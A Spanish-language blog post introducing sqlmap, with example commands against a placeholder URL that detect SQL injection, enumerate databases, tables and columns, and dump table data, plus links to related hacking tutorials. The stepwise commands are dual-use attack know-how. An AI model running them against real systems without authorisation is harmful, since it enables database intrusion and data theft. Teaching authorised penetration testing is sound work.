Ir al contenido principal

🥇▷ Que es sqlmap

 

SQLMap es una popular herramienta de código abierto utilizada para automatizar pruebas de penetración relacionadas con inyecciones de SQL. Se utiliza para detectar y explotar vulnerabilidades de inyección de SQL en aplicaciones web Sin embargo, es importante enfatizar que solo debe usarse de manera ética, con el consentimiento del propietario del sistema y con fines de prueba de seguridad legítimos.

Aquí tienes algunos ejemplos básicos de cómo utilizar SQLMap para detectar y explotar una vulnerabilidad de inyección de SQL:

  1. Detectar una inyección de SQL:

sqlmap -u "http://www.example.com/page.php?id=1" 

 

Este comando intenta detectar una vulnerabilidad de inyección de SQL en el parámetro "id" de la URL proporcionada.

  1. Enumerar las bases de datos:

 

sqlmap -u "http://www.example.com/page.php?id=1" --dbs 

 

Este comando enumera las bases de datos disponibles una vez que SQLMap ha detectado una vulnerabilidad de inyección de SQL.

  1. Enumerar tablas en una base de datos:

sqlmap -u "http://www.example.com/page.php?id=1" -D dbname --tables

Reemplaza "dbname" por el nombre de la base de datos detectada en el paso anterior. Este comando enumera las tablas disponibles en la base de datos especificada.

  1. Enumerar columnas de una tabla:

 

sqlmap -u "http://www.example.com/page.php?id=1" -D dbname -T tablename --columns

Reemplaza "dbname" por el nombre de la base de datos y "tablename" por el nombre de la tabla obtenidos en los pasos anteriores. Este comando enumera las columnas disponibles en la tabla especificada.

  1. Obtener datos de una tabla: 

sqlmap -u "http://www.example.com/page.php?id=1" -D dbname -T tablename -C columnname --dump

Reemplaza "dbname", "tablename" y "columnname" por los nombres de la base de datos, tabla y columna obtenidos en los pasos anteriores. Este comando extrae y muestra los datos de la columna especificada.

Recuerda que debes utilizar SQLMap de manera ética y responsable, asegurándote de obtener el permiso adecuado antes de realizar pruebas de penetración en cualquier aplicación web.

 

Entradas populares de este blog

🥇▷ Como hackear una base de datos con sqlmap

Como hackear una base de datos con sqlmap (sql injection) sqlmap --help Nos descargamos la pagina web vulnerable (DVWA) para practicar sobre diferentes ataques a nivel Web desde la siguiente url, y seguimos los pasos que nos indican para la instalacion web y su base de datos. https://github.com/digininja/DVWA/releases Una vez instalado nos vamos a burpsuite que esta en kali linux, aunque lo podemos encontrar para windows tambien. Le damos click. En esta ventana le damos Next (siguiente). En esta ventana le damos Start burp. Se nos abrira la ventana de burpsuite. Por cierto burpsuite sirve para escanear webs y encontrar vulnerabilidades de forma automatica (30 dias gratis) o de forma manual gratis, si ya hemos localizado la vulnerabilidad atraves de un proxy. Esta vez lo hacemos de forma manual. Nos vamos a la pestaña proxy. Activamos intercept is on. Y le damos a open browser. Ponemos la direccion Web de DVWA de nuestra web vulnerable. Le d

🥇▷ Vulnerabilidad xss en web gva.es generalitat valenciana

Vulnerabilidad xss reflected en web generalitat valenciana > gva.es El dia que encontremos 2 vulnerabilidades y la reportemos al organismo de la comunidad valenciana (españa) basada en la vulnerabilidad xss reflected. ¿Que es una vulnerabilidad xss reflected? Una secuencia de comandos en sitios cruzados o Cross-site scripting es un tipo de vulnerabilidad informática o agujero de seguridad típico de las aplicaciones Web, que puede permitir a una tercera persona inyectar en páginas web visitadas por el usuario código JavaScript o en otro lenguaje similar.

🥇▷ Libros de Seguridad Informatica

Libros de Seguridad Informatica https://0xword.com/